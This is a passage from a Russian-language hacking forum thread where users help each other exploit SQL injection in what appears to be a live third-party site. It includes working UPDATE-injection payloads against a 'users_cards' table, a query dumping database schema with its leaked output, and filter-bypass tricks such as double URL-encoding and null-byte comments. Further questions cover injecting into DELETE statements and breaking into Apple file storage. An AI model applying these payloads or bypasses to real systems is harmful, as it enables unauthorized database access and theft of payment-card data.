Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    update users_cards set cardno = '',cardno=version(), name='', name = '' where id_users=65 and id=33
     
    _________________________
    crlf, erwerr2321 and foozzione like this.
  2. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    Code:
    update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
    ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3
     
  3. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    да, можно через dios составить схему базы http://forum.sqliwiki.com/showthread.php?tid=39 чтоб одним запросом
    насчет файлов не проверял, если file_priv = ON возможно получится читать файлы
     
    _________________________
    foozzione and erwerr2321 like this.
  5. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это
     
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    хз должно работать
    Code:
    ',cardno=(SELECT group_conCat('<br>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='
    
    -----------------
    ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить
     
    _________________________
    foozzione likes this.
  7. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    <br>buh:id,<br>buh:pos,<br>buh:name,<br>buh:eek:rderid,<br>buh:note,<br>buh:type_,<br>buh:active,<br>buh:val1_name,<br>buh:val1_amount,<br>buh:val1_rest,<br>buh:val1_com,<br>buh:val2_nam
    в name тоже скуля, там места больше, вот что выдало
     
    erwerr2321 and t0ma5 like this.
  8. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже
     
  9. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    как запросы к information_schema писать чтоль, серьезно)?
    Code:
    SELECT table_name from information_schema.tables limit 1,1
    SELECT column_name from information_schema.columns where table_name='table' limit 1,1
    
    таки вещи давно описаны - https://forum.antichat.ru/threads/sql-injection-polnyj-faq.43966/
     
    _________________________
    foozzione likes this.
  10. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    да я вялого поймал, запутал сам себя с запросов в update, мало с ним связывался... лул
     
  11. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Мистика :D После коммента с двумя прочерками пробел ставишь?
     
  12. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    конечно
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Не поверишь!!! иногда благодаря этому и схватывается скуль)))), хз почему так...
     
    _________________________
    foozzione likes this.
  14. VKAPI

    VKAPI Member

    Joined:
    25 Nov 2011
    Messages:
    142
    Likes Received:
    68
    Reputations:
    0
    в Яблочное хранилище файлов кто нить влазил ? при условии если телефон в руке ?
     
  15. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    sql-injection
    Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть?
    Даже с тем же table_name режет не говоря уже про таблицы с префиксом
     
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    двойной урлэнкод, /*%00*/ в начале запроса, запрос можно только одним методом передавать? попробовать другие(GET/POST/COOKIE)
    https://forum.antichat.ru/threads/zadanie-1.453986/page-2#post-4120139 - редкий случай, но тоже может быть
     
    _________________________
    erwerr2321, crlf and Gorev like this.
  17. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Можно провести SQL Injection?
    Code:
        $login = $_POST['login'];
        $login = stripslashes($login);   
        $login = htmlspecialchars($login);
     
  18. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    эм а трабла конкретно в чём? давай подробней

    Code:
    $ cat 1.php
    <?php
    $login = $_POST['login'];
    $login = stripslashes($login);
    $login = htmlspecialchars($login);
    
    var_dump($login);
    
    ------------------------
    
    :~$ curl ******/1.php' --data 'login=123%27or1%271'
    string(9) "123'or1'1"
    
    
     
    _________________________
  19. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    В iframe невозможно открыть страницу если у саита https как у vk например
     
  20. garrik

    garrik New Member

    Joined:
    1 Jul 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Можно ли что-то внедрить или считать с базы, если инъекция есть в конце запроса DELETE FROM ?
    То есть имеем запрос "DELETE FROM My_Messages WHERE Message_Number =Инъекция
    К сожалению база данных не поддерживает разделение запросов с помощью точки с запятой.